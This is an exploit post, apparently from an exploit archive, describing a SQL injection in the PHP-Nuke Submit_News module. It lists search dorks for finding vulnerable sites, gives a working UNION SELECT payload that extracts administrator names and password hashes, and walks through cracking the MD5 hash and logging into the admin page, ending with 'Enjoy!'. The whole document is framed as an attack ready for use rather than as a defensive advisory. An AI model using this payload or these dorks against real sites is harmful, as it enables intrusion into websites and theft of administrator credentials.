facebook facebook twitter rss

PHP-Nuke Submit_News Sql Injection Vulnerability

Author: Iran Cyber Security Group , Published: 08-06-2015
# Exploit Title : PHP-Nuke Submit_News Sql Injection Vulnerability

# Date : 07/06/2015

# Exploit Author : Iran Cyber Security Group

# Discovered By : root3r & KamraN HellisH

# Contact : root3r.blackhat@gmail.com & root3r.blackhat@hotmail.com

# Software Link : www.phpnuke.ir & www.phpnuke.com

# Version : All Versions

# Category : Web Application Bugs

# Dorks :
inurl:// /modules/Submit_News/index.php
inurl:// /modules/MT-Gallery/copyright.php
inurl:// /modules/Your_Account/index.php
inurl:// /modules/Web_Links/index.php
inurl:// /blocks/block-CZUser-Info.php
inurl:// /ultramode.txt
PHP-Nuke Project By PHPNuke.ir 13
Designed by : MrNuke
inurl:/modules.php?name=Submit_News

# Tested On : Windows

# Home : Iran-Cyber.Org

PoC :

Change The URL To : " site.com/modules.php?name=Submit_News " Then Run The Tamper Data Add-On And Click Start Tamper.

Choose A Category For The Post And Type Anything You Want In The Fields And Then Click Preview.

Tamper The Sending Data By Tamper Data Then Edit The Topic Number To

-<topicnumber>' UNION SELECT 1,group_concat(aid,0x3a,pwd) from nuke_authors--+

And Click Ok To Send Edited Data To The Server. In The Preview Of Post You Will See The Admin Username And The Hashed Password.

Then Crack The MD5 Hash By http://www.hashkiller.co.uk/md5-decrypter.aspx Or Other Softwares To Get The Password.Then Go To The Admin Page And Login.

Admin Page Url Is : site.com/admin.php

Enjoy !

Thanks To : MOHAMAD NOFOZI - Sheytan Azzam - WH!T3 W01F - JOK3R - CRYSIS BL4CK And All Members of Iran Cyber Security Group

Like us on Facebook :